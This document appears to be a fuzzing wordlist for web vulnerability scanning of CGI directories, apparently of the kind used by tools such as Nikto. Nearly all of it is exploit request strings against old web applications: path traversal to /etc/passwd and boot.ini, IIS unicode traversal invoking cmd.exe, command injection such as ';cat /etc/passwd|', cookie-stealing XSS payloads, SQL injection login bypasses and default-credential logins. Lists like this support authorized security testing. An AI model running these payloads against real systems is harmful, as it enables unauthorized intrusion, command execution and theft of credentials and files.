# fuzz inside cgi directories - on windows, this is usually /scripts /bin /cgi or /cgi-bin, on unix, usually /cgi-bin /cgi or /nph-cgi
14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
14all.cgi?cfg=../../../../../../../../etc/passwd
666%0a%0a666.jsp
852566C90012664F
.aspx
.jsp
.shtm
.shtml
.stm
.thtml
?D=A
?M=A
?N=D
?Open
?OpenServer
?PageServices
?S=A
?\">
?mod=&op=browse
?mod=node&nid=some_thing&op=view
?mod=some_thing&op=browse
?pattern=/etc/*&sort=name
?sql_debug=1
?wp-cs-dump
ADMINconfig.php
ASP/cart/database/metacart.mdb
AT-admin.cgi
AT-generate.cgi
Admin/
Admin_files/
Admin_files/order.log
Administration/
Agent/
Agentes/
Agents/
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
AnyBoard.cgi
AnyForm
AnyForm2
Asp/
BACLIENT
Backup/add-passwd.cgi
C
CFIDE/administrator/index.cfm
CFIDE/probe.cfm
COM
CSMailto.cgi
CSMailto/CSMailto.cgi
CSNews.cgi
CVS/Entries
Cgitest.exe
Citrix/ICAWEB/
Citrix/MetaFrameXP/default/login.asp
Citrix/PNAgent/
Config1.htm
Count.cgi
DB4Web/10.10.10.10:100
DC
DCFORM
DCFORMS98.CGI
DCShop/auth_data/auth_user_file.txt
DCShop/orders/orders.txt
DEASAppDesign.nsf
DEASLog.nsf
DEASLog01.nsf
DEASLog02.nsf
DEASLog03.nsf
DEASLog04.nsf
DEASLog05.nsf
DEESAdmin.nsf
DMR/
Data/settings.xml+
DomainFiles/*//../../../../../../../../../../etc/passwd
EXE/
Excel/
File
FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
FileSeek.cgi?head=&foot=;cat%20/etc/passwd
FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
FormMail.cgi?
modules/Search/index.php
modules/Submit/index.php?op=pre&title=
modules/WebChat/in.php+
modules/WebChat/out.php
modules/WebChat/quit.php
modules/WebChat/users.php
modules/Your_Account/navbar.php+
moin.cgi?test
mojo/mojo.cgi
moregroupware/modules/webmail2/inc/
movimientos/
mp3/
mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
mqseries/
mrtg.cfg?cfg=../../../../../../../../etc/passwd
mrtg.cgi?cfg=../../../../../../../../etc/passwd
mrtg.cgi?cfg=blah
ms_proxy_auth_query/
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
msadc/msadcs.dll
msadc/samples/adctest.asp
msadm/domain/index.php3?account_name=\">
msadm/site/index.php3?authid=\">
msadm/user/login.php3?account_name=\">
msdwda.nsf
mspress30/
msql/
msword/
mt-static/
mt-static/mt-check.cgi
mt-static/mt-load.cgi
mt-static/mt.cfg
mt/
mt/mt-check.cgi
mt/mt-load.cgi
mt/mt.cfg
mtatbls.nsf
mtdata/mtstore.nsf
mtstore.nsf
multihtml.pl?multi=/etc/passwd%00html
musicqueue.cgi
myguestBk/add1.asp?|-|0|404_Object_Not_Found
myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
myguestbook.cgi?action=view
myhome.php?action=messages&box=
myinvoicer/config.inc
mylog.html?screen=/etc/passwd
mylog.phtml?screen=/etc/passwd
myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
na_admin/
na_admin/ataglance.html
namazu.cgi
names.nsf
nav/cList.php?root=
netutils/findata.stm?user=
netutils/ipdata.stm?ipaddr=
netutils/whodata.stm?sitename=
new
new/
news
news/news.mdb
newsdesk.cgi?t=../../../../../../../../../../etc
newsdesk.cgi?t=../../../../../../../../../../etc/passwd
newtopic.php
newuser?Image=../../database/rbsserv.mdb
nikto.ida
nimages.php
nl/
nlog-smb.cgi
nlog-smb.pl
nntp/nd000000.nsf
nntp/nd000001.nsf
nntp/nd000002.nsf
nntp/nd000003.nsf
nntp/nd000004.nsf
nntppost.nsf
node/view/666\">
non-existent.pl
noshell
nosuchurl/>
notes.nsf
noticias/
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
nph-error.pl
nph-exploitscanget.cgi
nph-maillist.pl
nph-publish
nph-publish.cgi
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
nph-test-cgi
nphp/nphpd.php
npn_admn.nsf
npn_rn.nsf
ns-icons/
nsn/..%5Cutil/attrib.bas
nsn/..%5Cutil/chkvol.bas
nsn/..%5Cutil/copy.bas
nsn/..%5Cutil/del.bas
nsn/..%5Cutil/dir.bas
nsn/..%5Cutil/dsbrowse.bas
nsn/..%5Cutil/glist.bas
nsn/..%5Cutil/lancard.bas
nsn/..%5Cutil/md.bas
nsn/..%5Cutil/rd.bas
nsn/..%5Cutil/ren.bas
nsn/..%5Cutil/send.bas
nsn/..%5Cutil/set.bas
nsn/..%5Cutil/slist.bas
nsn/..%5Cutil/type.bas
nsn/..%5Cutil/userlist.bas
nsn/..%5Cweb/env.bas
nsn/..%5Cweb/fdir.bas
nsn/..%5Cwebdemo/env.bas
nsn/..%5Cwebdemo/fdir.bas
nsn/env.bas
nsn/fdir.bas
nsn/fdir.bas:ShowVolume
ntitar.pl
ntsync4.nsf
ntsync45.nsf
nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
nul..cfm
nul..dbm
nul.cfm
nul.dbm
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
oc/Search/SQLQHit.asp
oc/Search/sqlqhit.asp
odbc/
oekaki/
oem_webstage/cgi-bin/oemapp_cgi
oem_webstage/oem.conf
officescan/cgi/cgiChkMasterPwd.exe
officescan/cgi/jdkRqNotify.exe
officescan/hotdownload/ofscan.ini
ojspdemos/basic/hellouser/hellouser.jsp
ojspdemos/basic/simple/usebean.jsp
ojspdemos/basic/simple/welcomeuser.jsp
old/
open?
openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
openautoclassifieds/friendmail.php?listing=
opendir.php?/etc/passwd
opendir.php?requesturl=/etc/passwd
oprocmgr-status
options.inc.php+
options.php?optpage=
oracle
oradata/
order/
order/order_log.dat
order/order_log_v12.dat
orders/
orders/checks.txt
orders/mountain.cfg
orders/order_log.dat
orders/order_log_v12.dat
orders/orders.log
orders/orders.txt
oscommerce/default.php
outgoing/
owa_util%2esignature
ows-bin/oaskill.exe?abcde.exe
ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
ows-bin/perlidlc.bat?&dir
ows/
ows/restricted%2eshow
pafiledb/includes/team/file.php
page.cgi?../../../../../../../../../../etc/passwd
pagelog.cgi
pages/
pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
pals-cgi?palsAction=restart&documentName=/etc/passwd
parse-file
parse_xml.cgi
pass
pass_done.php
passwd
passwd.adjunct
passwd.txt
passwdfile
password
password.inc
password/
passwords.txt
passwords/
path/nw/article.php?id='
pbcgi.cgi?name=Joe%Camel&email=%3C
pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
pbserver/pbserver.dll
pccsmysqladm/incs/dbconnect.inc
pdf/
people.list
perl
perl-status
perl.exe
perl.exe?-v
perl/
perl/-e%20%22system('cat%20/etc/passwd');\%22
perl/-e%20print%20Hello
perl/env.pl
perl/files.pl
perl/printenv
perl/samples/env.pl
perl/samples/lancgi.pl
perl/samples/ndslogin.pl
perl/samples/volscgi.pl
perl5/
perl5/files.pl
perl?-v
perlshop.cgi
perweb.nsf
pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
pfdispaly.cgi?../../../../../../../../../../etc
pfdispaly.cgi?../../../../../../../../../../etc/passwd
pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
phf
phf.cgi?QALIA
phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
phf?Qname=root%0Acat%20/etc/passwd%20
phorum/admin/footer.php?GLOBALS[message]=
phorum/admin/header.php?GLOBALS[message]=
phorum/admin/stats.php
photo/
photo/manage.cgi
photo/protected/manage.cgi
photo_album/apa_phpinclude.inc.php
photodata/
photodata/manage.cgi
php-cgi
php-coolfile/action.php?action=edit&file=config.php
php.cgi?/etc/passwd
php.ini
php/
php/gaestebuch/admin/index.php
php/index.php
php/mlog.html
php/mlog.phtml
php/mylog.html?screen=/etc/passwd
php/mylog.phtml?screen=/etc/passwd
php/php.exe?c:\boot.ini
php/php.exe?c:\winnt\boot.ini
php/php4ts.dll
phpBB/phpinfo.php
phpBB/viewtopic.php?t=17071&highlight=\">\"
phpBB/viewtopic.php?topic_id=
phpBB2/includes/db.php
phpBB2/search.php?search_id=1\
phpEventCalendar/file_upload.php
phpMyAdmin/
phpclassifieds/latestwap.php?url=
phpimageview.php?pic=javascript:alert('Vulnerable')
phpinfo.php
phpinfo.php3
phpinfo.php3?VARIABLE=
phpinfo.php?GLOBALS[test]=
phpinfo.php?VARIABLE=
phpinfo.php?cx[]=JUNK(4096)
phpmyadmin/
phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
phprocketaddin/?page=../../../../../../../../../../boot.ini
phprocketaddin/?page=../../../../../../../../../../etc/passwd
phpshare/phpshare.php
phptonuke.php?filnavn=/etc/passwd
phptonuke.php?filnavn=
phpwebchat/register.php?register=yes&username=OverG&email=&email1=
phpwebfilemgr/index.php?f=../../../../../../../../../etc
phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\">
phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\">
phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\">&MMN_position=[X:X]
phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\">
pics/
piranha/secure/passwd.php3
pix/
pks/lookup
pls/admin
pls/dadname/htp.print?cbuf=
pls/help/
pls/ldc/admin_/
pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT
pls/portal/HTP.PRINT
pls/portal/PORTAL.home
pls/portal/PORTAL.wwa_app_module.link
pls/portal/PORTAL.wwv_dynxml_generator.show
pls/portal/PORTAL.wwv_form.genpopuplist
pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO
pls/portal/PORTAL.wwv_setting.render_css
pls/portal/PORTAL.wwv_ui_lovf.show
pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
pls/portal/SELECT
pls/portal/null
pls/portal/owa_util.cellsprint?p_theQuery=select
pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users
pls/portal/owa_util.listprint?p_theQuery=select
pls/portal/owa_util.show_query_columns?ctable=sys.dba_users
pls/portal/owa_util.showsource?cname=owa_util
pls/portal/owa_util.signature
pls/portal30/admin_/
pls/sample/admin_/help/..%255cplsql.conf
pls/simpledad/admin_/
pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
pls/simpledad/admin_/dadentries.htm
pls/simpledad/admin_/gateway.htm?schema=sample
pls/simpledad/admin_/globalsettings.htm
plusmail
pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
pm/lib.inc.php
pm_buddy_list.asp?name=A&desc=B%22%3E%3Ca%20s=%22&code=1
pmlite.php
pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
poll
pollit/Poll_It_
pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
polls
pollssi.cgi
poppassd.php3+
porn/
post-query
post16.exe
post32.exe|dir%20c:\\
post_query
postcards.cgi
postinfo.html
postnuke/html/index.php?module=My_eGallery
postnuke/html/modules.php?op=modload&name=News&file=article&sid=
postnuke/index.php?module=My_eGallery
postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft
powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
powerup/r.cgi?FILE=../../../../../../../../../../passwd
pp.php?action=login
ppdscgi.exe
pr0n/
prd.i/pgen/
printenv
printenv.tmp
privado/
private.nsf
private/
probecontrol.cgi?command=enable&username=cancer&password=killer
processit.pl
prod/
produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
product_info.php
productcart/database/EIPC.mdb
productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
profile.cgi
profile.php?u=JUNK(8)
profiles.php?uid=<script>alert(document.cookie)</script>
profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>
project/index.php?m=projects&user_cookie=1
prometheus-all/index.php
pron/
proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\"
protected/
protected/secret.html+
protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='
protection.php
proxy/ssllogin?user=administrator&password=administrator
proxy/ssllogin?user=administrator&password=operator
proxy/ssllogin?user=administrator&password=user
prueba/
pruebas/
prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
pt_config.inc
ptg_upgrade_pkg.log
pu3.pl
pub/
pub/english.cgi?op=rmail
public.nsf
public/
publica/
publicar/
publico/
publisher/
publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
purchase/
purchases/
put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20
pvote/ch_info.php?newpass=password&confirm=password%20
pvote/del.php?pollorder=1%20
pw/
pw/storemgr.pw
pwd.db
python/
qpadmin.nsf
query
query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
query?mss=%2e%2e/config
quickplace/quickplace/main.nsf
quickstart/qstart50.nsf
quickstart/wwsample.nsf
quickstore.cgi?page=../../../../../../../../../../etc
quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
quikmail/nph-emumail.cgi?type=../%00
quikstore.cfg
quikstore.cgi
quizme.cgi
r.cgi?FILE=../../../../../../../../../../etc
r.cgi?FILE=../../../../../../../../../../etc/passwd
ratlog.cgi
reademail.pl
readme
readme.eml
readme.nsf
readme.txt
readmec.nsf
readmes.nsf
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
redirect
register.cgi
register/
registered/
replicator/webpage.cgi/
replymsg.php?send=1&destin=
reports.nsf
reports/
reports/rwservlet
reports/rwservlet/getjobid4?server=myrep
reports/rwservlet/getjobid7?server=myrep
reports/rwservlet/showenv
reports/rwservlet/showjobs
reports/rwservlet/showmap
reports/rwservlet/showmap?server=myserver
reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
reports/temp/
reseller/
responder.cgi
restricted/
retail/
retrieve_password.pl
reviews/newpro.cgi
rguest.exe
rightfax/fuwww.dll/?
rksh
rmp_query
robadmin.cgi
robpoll.cgi
room/save_item.php
root
root/
rpc.php?q=">
rpc.php?q='&t='
rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
rpm_query
rsh
rtm.log
rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.
rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.
rwcgi60
rwcgi60/showenv
rwwwshell.pl
sales/
sam
sam._
sam.bin
sample/
sample/faqw46
sample/framew46
sample/pagesw46
sample/siregw46
sample/site1w4646
sample/site2w4646
sample/site3w4646
samples/
samples/search.dll?query=
samples/search/queryhit.htm
save/
sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
sawmill?rfcf+%22
sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
sbcgi/sitebuilder.cgi
sca/menu.jsp
schema50.nsf
scoadminreg.cgi
scozbook/view.php?PG=whatever
scr/
scratch
screen.php
script>alert('Vulnerable').cfm
scripts
scripts/*%0a.pl
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"
scripts/CGImail.exe
scripts/Carello/Carello.dll
scripts/admin.pl
scripts/cfgwiz.exe
scripts/contents.htm
scripts/convert.bas
scripts/counter.exe
scripts/cphost.dll
scripts/cpshost.dll
scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
scripts/fpadmcgi.exe
scripts/fpadmin.htm
scripts/fpcount.exe
scripts/fpremadm.exe
scripts/fpsrvadm.exe
scripts/httpodbc.dll
scripts/iisadmin/bdir.htr
scripts/iisadmin/ism.dll
scripts/no-such-file.pl
scripts/postinfo.asp
scripts/proxy/w3proxy.dll
scripts/repost.asp
scripts/root.exe?/c+dir+c:\+/OG
scripts/samples/ctguestb.idc
scripts/samples/search/author.idq
scripts/samples/search/filesize.idq
scripts/samples/search/filetime.idq
scripts/samples/search/qfullhit.htw
scripts/samples/search/qsumrhit.htw
scripts/samples/search/queryhit.idq
scripts/samples/search/simple.idq
scripts/samples/search/webhits.exe
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]
scripts/tools/ctss.idc
scripts/tools/dsnform
scripts/tools/dsnform.exe
scripts/tools/getdrvrs.exe
scripts/tools/newdsn.exe
scripts/tradecli.dll
scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
scripts/weblog
scripts/wsisa.dll/WService=anything?WSMadmin
se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
search.asp?Search=
search.asp?Search=\"><script>alert(Vulnerable)</script>
search.asp?term=<%00script>alert('Vulnerable')
search.cgi
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
search.php?mailbox=INBOX&what=x&where=&submit=Search
search.php?searchfor=\">
search.php?searchstring=
search.php?sess=your_session_id&lookfor=<script>alert(document.cookie)</script>
search.php?zoom_query=
search.pl
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=
search.pl?form=../../../../../../../../../../etc
search.pl?form=../../../../../../../../../../etc/passwd%00
search.vts
search/
search/?SectionIDOverride=1&SearchText=
search/SQLQHit.asp
search/htx/SQLQHit.asp
search/htx/sqlqhit.asp
search/inc/
search/index.cfm?
search/results.stm?query=<script>alert('vulnerable');</script>
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../etc
search/sqlqhit.asp
search97.vts
search?NS-query-pat=../../../../../../../../../../etc/passwd
search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
secret.nsf
secret/
secure/
securecontrolpanel/
secured/
securelogin/1,2345,A,00.html
security/web_access.html
sell/
sendform.cgi
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
sendphoto.php
sendtemp.pl?templ=../../../../../../../../../../etc
sendtemp.pl?templ=../../../../../../../../../../etc/passwd
sensepost.exe?/c+dir
server-info
server-status
server/
server_stats/
servers/link.cgi
service/
services/
servicio/
servicios/
servlet/AdminServlet
servlet/ContentServer?pagename=
servlet/CookieExample?cookiename=
servlet/Counter
servlet/DateServlet
servlet/FingerServlet
servlet/HelloWorldServlet
servlet/IsItWorking
servlet/MsgPage?action=test&msg=
servlet/PrintServlet
servlet/SchedulerTransfer
servlet/SearchServlet
servlet/ServletManager
servlet/SessionManager
servlet/SessionServlet
servlet/SimpleServlet
servlet/SnoopServlet
servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a
servlet/allaire.jrun.ssi.SSIFilter
servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
servlet/com.newatlanta.servletexec.JSP10Servlet/
servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
servlet/com.unify.servletexec.UploadServlet
servlet/custMsg?guestName=
servlet/gwmonitor
servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
servlet/org.apache.catalina.ContainerServlet/
servlet/org.apache.catalina.Context/
servlet/org.apache.catalina.Globals/
servlet/org.apache.catalina.servlets.WebdavStatus/
servlet/sq1cdsn
servlet/sqlcdsn
servlet/sunexamples.BBoardServlet
servlet/webacc
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
servlet/webacc?User.html=noexist
servlet/webpub
servlets/MsgPage?action=badlogin&msg=
servlets/SchedulerTransfer
servlets/weboam/oam/oamLogin
session/adminlogin
session/admnlogin
setpasswd.cgi
settings/site.ini
setup.exe?&page=list_users&user=P
setup.nsf
setup/
setupweb.nsf
sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
sgdynamo.exe?HTNAME=
sh
shop.cgi?page=../../../../../../../etc/passwd
shop.pl/page=;cat%20shop.pl|
shop/
shop/auth_data/auth_user_file.txt
shop/database/metacart.mdb
shop/member_html.cgi?file=;cat%20/etc/passwd|
shop/member_html.cgi?file=|cat%20/etc/passwd|
shop/normal_html.cgi?file=<script>alert(\"Vulnerable\")</script>
shop/normal_html.cgi?file=../../../../../../etc/issue%00
shop/normal_html.cgi?file=;cat%20/etc/passwd|
shop/normal_html.cgi?file=|cat%20/etc/passwd|
shop/orders/orders.txt
shop/php_files/site.config.php+
shop/search.php
shop/show.php
shopa_sessionlist.asp
shopadmin.asp
shopadmin.asp?Password=abc&UserName=">
shopdbtest.asp
shopexd.asp?catalogid='42
shoponline/fpdb/shop.mdb
shopper.cgi?newpage=../../../../../../../../../../etc
shopper.cgi?newpage=../../../../../../../../../../etc/passwd
shopper/
shopping/database/metacart.mdb
shopping/diag_dbtest.asp
shopping/shopdisplayproducts.asp?id=1&cat=
shopping300.mdb
shopping400.mdb
shoppingdirectory/midicart.mdb
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
shoutbox.php?conf=../../../../../../../etc/passwd
shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
show.pl
showcat.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>
showcheckins.cgi?person=
showcheckins.cgi?person=
showmail.pl
showmail.pl?Folder=
showuser.cgi
shtml.dll
signon
simple/view_page?mv_arg=|cat%20/etc/passwd|
simplebbs/users/users.php
simplestguest.cgi
simplestmail.cgi
sips/sipssys/users/a/admin/user
site/'
site/eg/source.asp
site/iissamples/
site_searcher.cgi
sitemap.xml
siteminder
siteminder/smadmin.html
siteseed/
siteserver/publishing/viewcode.asp?source=/default.asp
smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
smbcfg.nsf
smconf.nsf
smency.nsf
smg_Smxcfg30.exe?vcc=3560121183d3
smhelp.nsf
smmsg.nsf
smquar.nsf
smsolar.nsf
smssend.php
smtime.nsf
smtp.box
smtp.nsf
smtpibwq.nsf
smtpobwq.nsf
smtptbls.nsf
smvlog.nsf
soap/servlet/soaprouter
soapConfig.xml
soapdocs/ReleaseNotes.html
soapdocs/webapps/soap/
soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
software.nsf
software/
soinfo.php?\">
sojourn.cgi?cat=../../../../../../../../../../etc
sojourn.cgi?cat=../../../../../../../../../../etc/password%00
solaris/
some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
source/
spelling.php3+
spin_client.cgi?aaaaaaaa
spwd
sql/
sqldump.sql
sqlnet.log
sqlqhit.asp
squirrelmail/src/read_body.php
src/
src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
srchadm
srvinst.nsf
srvnam.htm
srvstatus.chl+
ss
ss.cfg
ss000007.pl?PRODREF=
sscd_suncourier.pl
ssdefs/siteseed.dtd
ssi/
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
staff/
start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
start.php?config=alper.inc.php
stat.htm
stat.pl
stat/
staticpages/index.php
statistic/
statistics/
statmail.nsf
statrep.nsf
stats-bin-p/reports/index.html
stats.htm
stats.html
stats.pl
stats.prf
stats.txt
stats/
stats/statsbrowse.asp?filepath=c:\&Opt=3
stats_old/
statsconfig
status.php3
status/
status?full=true
statusconfig.pl
statview.pl
stauths.nsf
stautht.nsf
stconf.nsf
stconfig.nsf
stdnaset.nsf
stdomino.nsf
stlog.nsf
store.cgi?
store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
store/
